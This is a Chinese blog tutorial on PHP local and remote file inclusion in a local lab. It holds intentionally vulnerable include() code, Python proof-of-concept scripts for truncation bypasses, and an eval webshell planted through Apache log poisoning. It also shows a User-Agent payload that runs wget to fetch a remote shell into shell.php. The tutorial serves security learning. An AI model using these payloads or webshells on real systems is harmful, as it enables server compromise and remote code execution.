文件包含(LFI/RFI)

最新推荐文章于 2024-04-16 14:56:31 发布
最新推荐文章于 2024-04-16 14:56:31 发布
阅读量768 收藏 2
点赞数
分类专栏: 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LZHPIG/article/details/105588036
版权

“惩恶扬善,取财有道” 这八个字应该是这个时代,白帽子职业,最有尊严的生存方式。

0x00 环境准备

phpstudy
sublime
firefox(hackbar)

0x01 本地文件包含(LFI)

被包含的文件在服务器本地

1. 常见本地包含

① show_1.php

<?php
	if ($_GET['page']) {
		include($_GET['page']);
	}
	else{
		echo "please input the pragram as page";
	}
?>

② 1_php.jpg

<?php phpinfo();?>
结果
http://zhutou.com/file_include/show_1.php?page=upload/1_php.jpg

在这里插入图片描述

③ show_2.php

<?php
	if ($_GET['page']) {
		include("./action/".$_GET['page']);
	}
	else{
		echo "please input the pragram as page";
	}
?>
结果
http://zhutou.com/file_include/show_2.php?page=../upload/1_php.jpg

在这里插入图片描述

2. 截断本地包含

① 00 截断

条件:Magic_quote_gpc为off
原因:服务器的代码规定了包含文件的后缀

<?php
	if ($_GET['page']) {
		include("./action/".$_GET['page'].".php");
	}
	else{
		echo "please input the pragram as page";
	}
?>
结果
http://zhutou.com/file_include/show_3.php?page=../upload/1_php.jpg%00

在这里插入图片描述

Poc

这里需要注意 string = '../upload/1_php.jpg\u0000' 不能写成 string = '../upload/1_php.jpg%00',因为 %00 提交之后已经被编码成 \u0000
在这里插入图片描述

#!/usr/bin/env python
# -*- coding: utf-8 -*-

'''
环境:phpstudy 搭建
漏洞源码:/file_include/show_3.php
应用漏洞:文件包含,00截断
'''
import requests
import urllib.parse

'''
zero_cut = urllib.parse.quote('%00') #对 %00 进行 url 编码
print(zero_cut)
'''
string = '../upload/1_php.jpg\u0000' # 00 截断
url = "http://zhutou.com/file_include/show_3.php"
payload = {'page':string}
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0'}

r = requests.get(url=url,params=payload,headers=header)
result = r.content
result = result.decode()

if result.find('PHP Version 5.2.17') == -1: # 如果查找不到该字符串就返回 -1
    print('文件包含失败!')
else:
    print('文件包含成功!')
结果
C:\Python35\python.exe E:/pycharm_project/python_base/Poc/test/LFI_截断.py
文件包含成功!

Process finished with exit code 0

② 长文件名截断

Windows 和 Linux 的文件名长度是又限制的,超过长度的就会被忽略。通常情况下 Windows 的截断长度是 260,Linux 的长度是 4096。
PS: 在 Windows 文件名后面加 /. 或者 \. 都可以。

show_3.php
<?php
	if ($_GET['page']) {
		include($_GET['page'].".php");
	}
	else{
		echo "please input the pragram as page";
	}
?>
Poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-

'''
phpstudy 搭建
漏洞源码:/file_include/show_3.php
应用漏洞:文件包含,长文件名截断
'''
import requests

string = ''
for i in range(260):
    string += '/.'

string = 'upload/1_php.jpg' + string # 长文件名截断
url = "http://zhutou.com/file_include/show_3.php"
payload = {'page':string}
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0'}

r = requests.get(url=url,params=payload,headers=header)
result = r.content
result = result.decode()
print(result)
if result.find('PHP Version 5.2.17') == -1: # 如果查找不到该字符串就返回 -1
    print('文件包含失败!')
else:
    print('文件包含成功!')
结果
C:\Python35\python.exe E:/pycharm_project/python_base/Poc/test/LFI_截断.py
文件包含成功!

Process finished with exit code 0

0x02 远程文件包含(RFI)

被包含的文件在第三方服务器
条件:allow_url_include=On,默认是关闭,开启之后重启服务即可

1. 常见远程包含

用法和本地包含差不多,把本地的路径换为 url 即可

http://zhutou.com/file_include/show_1.php?page=http://zhutou.com/file_include/upload/1_php.jpg

2. 截断远程包含

问号截断法

把需要截断的地方当成参数或直接放在问号后面即可。

http://zhutou.com/file_include/show_1.php?page=http://zhutou.com/file_include/upload/1_php.jpg?id=

或者

http://zhutou.com/file_include/show_1.php?page=http://zhutou.com/file_include/upload/1_php.jpg?

0x03 利用

1. Apache 错误日志(error.log)上传一句话

① 原理

构造一条不存在的 URL ,并将一句话插入其中,访问出错后在 apache 的错误日志中会保存该 URL ,该方法很好地解决了不能上传图片马的问题。

② 错误的 URL

http://zhutou.com/<?php @eval($_POST['pass'])?>

如果 error.log 太大,浏览器访问超时的话,可以将一句话改为如下代码,使得包含日志的时候在网站自动生成 shell.php

<?php $fp=fopen("../../WWW/shell.php","W+");fputs($fp,"<?php @eval($_POST['pass']);?>");fclose($fp)?>

PS: 这里注意浏览器会自动给 URL 里面的字符编码,空格,尖括号等等。

③ 包含日志

apache 日志文件默认:
/etc/httpd/logs/access_log
/var/log/httpd/access_logs

通过 apache 的配置文件找日志文件路径:
/etc/httpd/conf/httpd
/etc/init.d/httpd

nignx 日志文件默认在 logs 目录下

Windows 2003 + iis6.0 日志文件默认在:
C:\WINDOWS\system32\Logfiles
配置文件默认在:
C:\Windows\system32\inetsrv\metabase.xml

iis 7 日志文件默认在:
%SystemDrive%inetpub\logs\LogFiles
配置文件默认目录:
C:\Windows\System\inetsrv\config\applicationHost.config

2. Linux 环境变量包含一句话

原理是包含/proc/self/environ,这里会有用户访问web的session信息,其中也会包含user-agent的参数,这个参数你浏览器名称的参数。而这个参数在我们客户端是可以修改的,
所以说想个办法修改user-agen,比如修改成

<?system('wget http://81sec.com/shell.txt -O shell.php');?>

然后提交一个,包含/proc/self/environ的请求就可以了。

3. 包含 data:// 或者 php://input 等协议

条件:allow_url_include=on
这是一个 php 的输入流,可以读到没有处理过的 POST 数据

$raw = file_get_contents('php://input','r');
echo $raw;

4. php://filter

http://zhutou.com/file_include/show_1.php?page=php://filter/read=convert.base64-encode/resource=demo.php
或者:
http://zhutou.com/file_include/show_1.php?page=php://filter/read=convert.base64-encode/resource=http://127.0.0.1/file_include/demo.php

0x04 参考文献

http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
https://blog.csdn.net/wangyi_lin/article/details/9837257
https://blog.csdn.net/zminr411421_/article/details/52042027#

                                                                                                                                          猪头
                                                                                                                                       2020.4.18
z_hunter
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 297
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
vulnerable:Php 脚本易受 SQLi、XSS、RFILFI 攻击,用于测试目的
06-05
在IT安全领域,尤其是Web应用安全,SQL注入(SQLi)、跨站脚本攻击(XSS)、远程文件包含RFI)和本地文件包含LFI)是四种常见的漏洞类型。这些漏洞通常源于PHP编程中的错误或疏忽,使得攻击者能够利用它们执行...
LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
weixin_45116657的博客
02-04 2424
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一、文件包含的基本概念 1、要想成功利用文件包含漏洞,需要满足下面的条件 (1)include()等函数通过动态变量的方式引入需要包含的文件 (2)用户能够控制该动态变量 二、LFI(Local File Include)本地文件包含 1、00字符截断 防御方法: ...
【复习】文件包含_02_截断
qq_45300786的博客
05-22 846
文件包含截断 1、00截断法 00字符截断(php<5.3.4) (需要 magic_quotes_gpc=off) /etc/passwd /etc/passwd%00 http://include.hahahaha.com/file02.php?file=x.jpg%00 2、超长文件截断 (php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256) 利用操作系统对目录最大长度限制。 在window下256字节 linux下4096字节 截断的字符有“.
文件包含漏洞长度截断(3),2024年最新2024年是做网络安全开发人员的绝佳时机
最新发布
2301_77116622的博客
04-16 315
当一个文件包含,后拼接了一个后缀时,都会在我们的伪协议后加上拼接的后缀,往往这个后缀就会导致我们访问失败,如何绕过?可以尝试00截断,也可以尝试我们接下来叙述的长度截断。
iwebsec靶场 文件包含漏洞通关笔记2-文件包含绕过(截断法)
mooyuan的博客
09-12 676
文件包含漏洞中,在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。文件上传的截断绕过通常源码包含如下字段,比如说传入的参数filename=phpinfo.txt,那么include时会为文件名加上 .html后缀,于是include的文件名就变为了phpinfo.txt.html,这样会导致文件包含漏洞利用出现失败。
文件包含漏洞(LFIRFI)(require()、include()函数)
Hardworking666的博客
05-10 4460
文章目录一、文件包含漏洞二、文件包含函数二、文件包含漏洞实例“百度杯”CTF比赛 2017 二月场include 一、文件包含漏洞 文件包含漏洞,是程序员在网站设计中,为方便自己在设计构架时,使用了一些包含的函数,在文件中,包含一个文件。 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。 这意味着可以创建供所有网页引用的标准页眉或菜单文件。 当页眉需要更新时,只更新一个包含文件就可以了,或者当向网站添加一张新页面时,仅仅需要修改一..
Web应用安全:远程文件包含利用.pptx
06-20
远程文件包含本质上和LFI(本地文件包含)是同一个概念,只是被包含的"文件源"(我们之后会了解到其实是流源)不是从本次磁盘上获得,而是从外部输入流得到。如果PHP的配置选项allow_url_include为ON的话,则include/...
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
这里区别一下RFI,远程文件包含突破; 实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞; PHP包含读文件; PHP包含写文件...
Web-安全渗透全套教程文件包含漏.zip
05-22
2. **漏洞分类**:涵盖本地文件包含LFI)和远程文件包含RFI)的区别,以及它们各自的风险和利用方法。 3. **攻击示例**:通过实际案例展示攻击者如何利用这些漏洞,可能包括代码注入、数据泄露、系统权限提升等...
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计
09-26
文件包含漏洞可以分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。本地文件包含是指包含的文件在本地服务器上,而远程文件包含是指包含的文件在远程服务器上。远程...
php包含截断小结.txt
07-24
php截断技术
文件包含
qq_63527808的博客
10-22 225
程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。程序在引用文件的时,引用的文件名,用户可控的情况,传入的文件名没有经过合理的校验或校验不严,从而操作了预想之外的文件,就有可能导致文件泄漏和恶意的代码注入。程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含
web安全原理-文件包含漏洞
笑花大王
01-20 350
前言 起来吃完早饭就开始刷攻防世界的题,一个简单的文件包含题我竟然都做不出来我服了 拿出买的书开始从头学习总结文件包含漏洞! 一、文件包含漏洞 文件包含漏洞 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。 文件包含漏洞肯能会造成服务器网页被篡改、网站被挂马、服...
文件操作漏洞之文件包含(六)
guanjian_ci的博客
02-21 751
第一部分:文件包含 1.文件包含基本概念 开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含分本地包含和远程包含. 典型特征 变量的值为一个页面: ?page=a.php ?home=b.html ?file=content… 2.文件包含漏洞利用的前提条件 (1)web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参 数的方式引入; (2)用户能够控制包含
Web安全-文件包含漏洞
11-04
文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用黑客控制的变量构建可执行代码的路径时,文件包含漏洞会导致黑客任意控制运行时执行的文件。      文件包含漏洞分为本地文件包含(Loacl File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)。这种漏洞貌不惊人,却危害很大。通过文件包含漏洞,可以读取系统中的敏感文件,源代码文件等,如密码文件,通过对密码文件进行暴力破解。若破解成功则可获取操作系统的用户账户,甚至可通过开放的远程连接服务进行连接控制。另外不管是本地文件包含还是远程文件包含文件包含漏洞还可能导致执行任意代码。      本节课程通过代码讲解文件包含漏洞的实战,深入理解文件包含漏洞的原理。
学习笔记-文件包含
m0_56171651的博客
08-19 1320
文件包含-学习笔记
文件包含之日志中毒(User-Agent)
qq_50854662的博客
09-28 458
文件包含之日志中毒(User-Agent)
文件包含\\&LFI\\&RFI\\&伪协议编码算法\\&代码审计
09-02
文件包含(LFI)和远程文件包含(RFI)是一种常见的安全漏洞,允许攻击者在应用程序中包含恶意文件或代码。LFI漏洞是指应用程序中允许用户通过文件包含功能来读取本地文件的漏洞。而RFI漏洞则是指应用程序中允许用户通过远程URL来包含外部文件的漏洞。这两种漏洞都可能导致攻击者获取敏感信息或者执行恶意代码。 伪协议编码算法是一种常见的技术,用于绕过安全控制并执行特定的操作。在这里提到的伪协议包括"php://filter"和"convert.base64-encode/decode"。通过使用这些伪协议,攻击者可以对文件进行编码和解码,从而绕过安全限制。 代码审计是一种评估应用程序源代码的过程,旨在发现潜在的安全漏洞和其他问题。通过仔细分析应用程序的代码,可以确定是否存在可能导致文件包含漏洞或其他安全问题的缺陷。 总结起来,文件包含漏洞和远程文件包含漏洞是一种常见的安全漏洞,可以通过伪协议编码算法来绕过安全限制。代码审计是一种评估应用程序源代码的方法,可以帮助发现和修复这些漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计](https://blog.csdn.net/m0_65336233/article/details/127363413)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [day42 文件包含&LFI&RFI&伪协议编码算法&代码审计](https://blog.csdn.net/hesysd/article/details/128248212)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值